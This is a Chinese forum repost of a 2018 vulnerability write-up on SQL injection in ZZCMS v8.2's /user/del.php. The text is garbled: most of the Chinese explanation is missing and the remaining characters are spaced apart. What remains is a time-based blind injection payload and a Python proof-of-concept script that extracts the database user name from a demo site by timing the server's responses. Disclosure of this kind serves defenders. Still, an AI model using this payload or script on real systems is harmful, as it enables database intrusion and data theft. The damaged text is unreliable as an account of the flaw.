[12331] 2018-02-07_ZZCMSv8.2最新版SQL注入漏洞

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2018-02-07_ZZCMSv8.2最新版SQL注入漏洞 Z Z C M S   v 8 . 2   S Q L v r _ s y s t e m   F r e e B u f   2 0 1 8 - 0 2 - 0 7 * v r _ s y s t e m F r e e B u f 0 x 0 0 C M S Z Z C M S   v 8 . 2 S Q L 0 x 0 1     / u s e r / d e l . p h p   S Q L   / u s e r / d e l . p h p   1 2 c h e c k i d ( )     $ i d c h e c k i d ( )   / i n c / f u n c t i o n . p h p   4 9 s w i t c h ( )   S Q L   1 3 5   S Q L
t a b l e n a m e   C M S   s e l e c t   i d , e d i t o r ,   f r o m   z z c m s _ a n s w e r   w h e r e   i d   =   1 a n d   i f ( ( a s c i i ( s u b s t r ( u s e r ( ) , 1 , 1 ) )   = 1 2 1 ) , s l e e p ( 5 ) , 1 ) # w h e r e   i d   i n   1 ;   S Q L 0 x 0 2   p a y l o a d : i d = 1 & t a b l e n a m e = z z c m s _ a n s w e r   w h e r e   i d   =   1   a n d   i f ( ( a s c i i ( s u b s t r ( u s e r ( ) , 1 , 1 ) )   = 1 2 1 ) , s l e e p ( 5 ) , 1 ) % 2 3 0 x 0 3 P O C p y t h o n P O C
* v r _ s y s t e m F r e e B u f # ! / u s r / b i n / e n v   p y t h o n #   - * -   c o d i n g :   u t f - 8   - * - i m p o r t   r e q u e s t s i m p o r t   t i m e p a y l o a d s   =   ' a b c d e f g h i g k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 @ _ . '         # u r l   =   " h t t p : / / d e m o . z z c m s . n e t / u s e r / d e l . p h p " u s e r   =   ' ' f o r   i   i n   r a n g e ( 1 ,   2 ) :                 f o r   p a y l o a d   i n   p a y l o a d s :         #                                 s t a r t T i m e   =   t i m e . t i m e ( )                                 p o s t _ d a t a   =   " i d = 1 & t a b l e n a m e = z z c m s _ a n s w e r   w h e r e   i d   =   1   a n d   i f ( ( a s c i i ( s u b s t r ( u s e r ( ) , 1 , 1 ) ) = "   +   s t r ( o r d ( p a y l o a d ) )   +   " ) , s l e e p ( 5 ) , 1 ) % 2 3 " . e n c o d e ( " u t f - 8 " )                                 r e s p o n s e   =   r e q u e s t s . p o s t ( u r l ,   t i m e o u t = 6 ,   d a t a = p o s t _ d a t a ,   h e a d e r s = { " C o n t e n t - T y p e " :   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d " }     ) i f   t i m e . t i m e ( )   -   s t a r t T i m e   >   5 :                                                 u s e r   =   p a y l o a d p r i n t   ' u s e r   i s : ' ,   u s e r b r e a k p r i n t   ' n [ D o n e ]   c u r r e n t   u s e r   i s   % s '   %   u s e r
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则